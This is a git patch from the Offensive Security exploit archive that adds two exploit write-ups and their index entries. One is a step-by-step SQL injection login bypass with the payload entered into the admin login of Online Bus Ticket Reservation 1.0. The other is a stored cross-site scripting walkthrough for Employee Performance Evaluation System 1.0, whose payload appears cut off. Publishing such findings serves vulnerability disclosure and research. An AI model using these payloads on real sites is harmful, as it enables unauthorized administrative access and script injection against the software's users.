From 78d4c26b55b350a616b44d3dff0c0cb5b32ecfc4 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 9 Dec 2020 05:01:56 +0000 Subject: [PATCH] DB: 2020-12-09 2 changes to exploits/shellcodes Online Bus Ticket Reservation 1.0 - SQL Injection Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting --- exploits/php/webapps/49212.txt | 20 ++++++++++++++++++++ exploits/php/webapps/49215.txt | 17 +++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 39 insertions(+) create mode 100644 exploits/php/webapps/49212.txt create mode 100644 exploits/php/webapps/49215.txt diff --git a/exploits/php/webapps/49212.txt b/exploits/php/webapps/49212.txt new file mode 100644 index 000000000..1892fc234 --- /dev/null +++ b/exploits/php/webapps/49212.txt @@ -0,0 +1,20 @@ +# Exploit Title: Online Bus Ticket Reservation 1.0 - SQL Injection +# Date: 2020-12-07 +# Exploit Author: Sakshi Sharma +# Vendor Homepage: https://www.sourcecodester.com/php/5012/online-bus-ticket-reservation-using-phpmysql.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/busreservation.zip +# Version: 1.0 +# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 + + +#Vulnerable Page: admin page + +#Exploit + Open the Application + check the URL: + http://localhost/busreservation/index.php + Open Admin Login + Enter username: 'or"=' + Enter password: 'or"=' + click on login +The SQL payload gets executed and authorization is bypassed successfully \ No newline at end of file diff --git a/exploits/php/webapps/49215.txt b/exploits/php/webapps/49215.txt new file mode 100644 index 000000000..dba26e9e4 --- /dev/null +++ b/exploits/php/webapps/49215.txt @@ -0,0 +1,17 @@ +# Exploit Title: Employee Performance Evaluation System 1.0 - ' Task and Description' Persistent Cross Site Scripting +# Date: 08/12/2020 +# Exploit Author: Ritesh Gohil +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14617/employee-performance-evaluation-system-phpmysqli-source-code.html +# Version: 1.0 +# Tested on: Windows 10/Kali Linux + +Steps to Reproduce: +1) Login with Admin Credentials and click on 'Task' button. +2) Click on Add New Task Button. +3) Now add the following payload input field of Task and Description + +Payload: ritesh"> + +4) Click On Save +5) XSS payload is triggered. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 52cc5c8b9..9334b50e4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43434,3 +43434,5 @@ id,file,description,date,author,type,platform,port 49204,exploits/php/webapps/49204.txt,"Cyber Cafe Management System Project (CCMS) 1.0 - Persistent Cross-Site Scripting",2020-12-07,"Pruthvi Nekkanti",webapps,php, 49208,exploits/php/webapps/49208.txt,"Savsoft Quiz 5 - 'Skype ID' Stored XSS",2020-12-07,"Dipak Panchal",webapps,php, 49209,exploits/php/webapps/49209.txt,"vBulletin 5.6.3 - 'group' Cross Site Scripting",2020-12-07,Vincent666,webapps,php, +49212,exploits/php/webapps/49212.txt,"Online Bus Ticket Reservation 1.0 - SQL Injection",2020-12-08,"Sakshi Sharma",webapps,php, +49215,exploits/php/webapps/49215.txt,"Employee Performance Evaluation System 1.0 - 'Task and Description' Persistent Cross Site Scripting",2020-12-08,"Ritesh Gohil",webapps,php,